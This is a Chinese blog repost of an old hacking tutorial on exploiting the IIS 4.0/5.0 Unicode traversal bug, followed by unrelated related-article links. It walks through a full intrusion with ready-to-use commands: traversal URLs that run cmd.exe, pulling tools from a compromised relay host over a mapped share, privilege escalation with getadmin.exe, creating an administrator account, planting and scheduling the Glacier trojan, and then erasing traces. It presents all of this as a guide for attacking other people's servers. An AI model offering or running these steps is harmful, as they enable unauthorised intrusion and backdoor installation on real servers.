unicode漏洞利用全攻略

转载 2006年06月12日 19:32:00

by 无用君
  IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在的安全漏洞已经成为了黑客们忠爱的漏洞之一,有希望成为2000年最大的漏洞之一。在此向发现此漏洞的中联绿盟成员袁哥及想出利用映射网络盘方法来解决文件上传问题的l uandao2000致敬。好了,开工吧!

首先是要找到一台带有共享盘的肉鸡,然后将其共享盘映射会本地。找带共享盘的主机不是很难,用国产的黑客软件网络刺客就可以了,在网络刺客中“主机资源”菜单里找“扫描共享主机”,然后填写启始i p和结束ip以后按扫描就,去看会儿电视,再回来看看扫描到没有。没扫描到再换个地址试试,扫描到了的话就可以把他用共享资源菜单中的“影射指定网络盘”把他影射为自己主机的任意一个盘上。
下面的工作就是把工具copy到肉鸡上,假设对方的共享盘为E,ip为127.1.1.2,我们把它影射到了F盘上。现在我们需要copy
自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下,可以到DOS下输入:
C:/"gt;copy c:/gasys.dll F:/

C:/"gt;copy c:/cmd.exe F:/

C:/"gt;copy c:/getadmin.exe F:/

至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E : http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy e:/winnt/system32/cmd.exe e:/inetpub/scripts/hackercn .exe
这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘: http://127.1.1.1/scripts/hackercn.exe?/c net use Y: //127.1.1.2/E
然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次): http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/gasys.dll d:/inetpub/scripts/gasys.dll http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/cmd.exe d:/inetpub/scripts/cmd.exe http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/getadmin.exe d:/inetpub/scripts/getadmin.exe

好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“S ERVERS”,那么我们可以这样做: http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS
这样所有的访问者都有了Administrator限权,然后我们再来新建一个用户名为hacker密码为password的用户: http://127.1.1.1/cgi-bin/cmd.exe?/c c:/winnt/system32/net.exe user hacker password /add
然后再把它授予Administrator限权: http://127.1.1.1/scripts/getadmin.exe?hacker

下来就是进入该系统并制作后门了:
在nt的dos下输入
C:/"gt;net use //127.1.1.1/ipc$ "quot;password"quot; /user:"quot;hacker"quot;
现在你已经登陆到了他的主机上,然后上传木马冰河:
C:/"gt;copy C:/unzipped/newglacier/G_Server.exe //127.1.1.1/admin$/system32
然后用net time来获得对方的时间:
C:/"gt;net time //127.1.1.1
假设对方的时间是5点40,那么我们将在5点43启动冰河程序:
C:/"gt;at //127.1.1.1 05:43 G_Server.exe

这样我们就完整的实现了一次入侵,别忘了最后要打扫战场。用冰河删除我们上传过的东西。在“开始”菜单中的“程序”菜单里用“管理工具”中“域用户管理器”的“菜单用户”里选“选择域”,然后输入/ /127.1.1.1,然后还原我们做过手脚的用户。

剩下的事就可以用我们植入的冰河来干了。当然,不见得总会那么走运,在入侵中还会碰到最开始copy文件限权不够等等问题,这就需要大家开动脑筋来解决了。祝各位好运!

相关文章推荐

Perl Unicode全攻略

转载:http://www.cnblogs.com/starspace/archive/2008/12/10.html 耐心看完本文,相信你今后在unicode处理上不会再有什么问题。 本文内容适用...

Perl Unicode全攻略

转载:http://www.cnblogs.com/starspace/archive/2008/12/10.html耐心看完本文,相信你今后在unicode处理上不会再有什么问题。本文内容适用于pe...

Win7下利用IIS自建网站全攻略!包括ASP和ASP.NET动态网站!高手勿入

Win7下利用IIS自建网站全攻略!包括ASP和ASP.NET动态网站!高手勿入 http://www.wyjexplorer.cn/Blog/View/F06CA17530CCC60B.html ...
  • wlanye
  • wlanye
  • 2012-02-15 14:02
  • 1522

【Visual C++】游戏开发笔记三十 DirectX11 2D纹理映射知识全攻略

本节知识先是对DirectX11关于2D纹理映射方面基础知识的一个讲解,然后通过一个demo的创建过程来将学到的理论知识付诸实践。       一、引言     在之前我们提到过,纹理实...

vc6开发activex并发布全攻略(三)(进阶篇)

前面两片文章我们制作了个一简单的 ActiveX,而这个ActiveX只实现了一个简单的计算功能。其实ActiveX控件的功能很好很强大,只要你能想到的,它基本都能够实现。可我现在的水平那也只能想到而...

Android知识梳理之屏幕适配全攻略

引言: 我相信Android碎片化问题是让所有的Android开发者都比较头疼的问题.尤其是屏幕适配这一块儿.想要自己的app在不同的设备上面都有一个比较好的显示效果.就必须做好相应的屏幕适配.本文是...

网站服务器Win2003系统网络安全设置全攻略

本篇文章主要讲述架设网站服务器——IIS6.0,网站架构:ASP+ACCESS——的安全设置,是结合网上相关教程和自己经验总结整理的服务器安全设置笔记,在此仅做为参考以飨网友。 Windows Se...
  • zm2714
  • zm2714
  • 2012-09-10 11:24
  • 7064

Linux配置Apache服务器全攻略

一,使用源代码安装  (1) 获得源代码  # lynx http://www.apache.org/dist/httpd/httpd-2_0_NN.tar.gz  NN表示当前所用的版本号。  (2...

Sublime Text 配置全攻略

http://code-tech.diandian.com/post/2012-07-18/40030958791 -->      大家好,今天给大家分享一款编辑器:sublime tex...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)